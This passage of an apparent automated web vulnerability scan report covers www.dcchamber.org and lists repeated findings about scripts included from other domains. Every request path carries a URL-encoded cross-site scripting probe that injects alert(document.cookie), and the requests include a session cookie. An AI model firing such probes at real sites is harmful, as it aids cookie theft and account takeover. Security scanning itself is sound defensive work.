Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:15 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21325

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.72.js"></script>
...[SNIP]...

16.49. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Wachovia_A_Wells_Fargo_Company.PNG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Wachovia_A_Wells_Fargo_Company.PNG

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Wachovia_A_Wells_Fargo_Company.PNG HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:19 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.72.js"></script>
...[SNIP]...

16.50. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Wal-Mart.PNG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Wal-Mart.PNG

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Wal-Mart.PNG HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:21 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21329

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.72.js"></script>
...[SNIP]...

16.51. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/WashingtonGas[1].PNG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/WashingtonGas[1].PNG

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/WashingtonGas[1].PNG HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:28 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21337

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.72.js"></script>
...[SNIP]...

16.52. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/banner_ace.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/banner_ace.png

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/banner_ace.png HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:26 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21331

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.72.js"></script>
...[SNIP]...

16.53. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/banner_comcast.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/banner_comcast.png

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/banner_comcast.png HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:14 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21335

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.72.js"></script>
...[SNIP]...

16.54. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/banner_verizon.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/banner_verizon.png

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/banner_verizon.png HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:22 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21335

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.72.js"></script>
...[SNIP]...

16.55. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/bbandt.PNG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/bbandt.PNG

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/bbandt.PNG HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:24 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21327

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.72.js"></script>
...[SNIP]...

16.56. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/deloitte.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/deloitte.png

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/deloitte.png HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:15 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21329

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.72.js"></script>
...[SNIP]...

16.57. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/hsbc.PNG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/hsbc.PNG

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/hsbc.PNG HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:21 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21325

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.72.js"></script>
...[SNIP]...

16.58. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/mcdean.PNG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/mcdean.PNG

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/mcdean.PNG HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:27 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21327

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.72.js"></script>
...[SNIP]...

16.59. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/octt.PNG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/octt.PNG

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/octt.PNG HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:17 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21325

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.72.js"></script>
...[SNIP]...

16.60. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/pepco2.PNG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/pepco2.PNG

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/pepco2.PNG HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:26 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21327

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.72.js"></script>
...[SNIP]...

16.61. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/pfizer_logo.PNG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/pfizer_logo.PNG

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/pfizer_logo.PNG HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:23 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21332

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.72.js"></script>
...[SNIP]...

16.62. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_Foundation_off.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_Foundation_off.gif

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_Foundation_off.gif HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
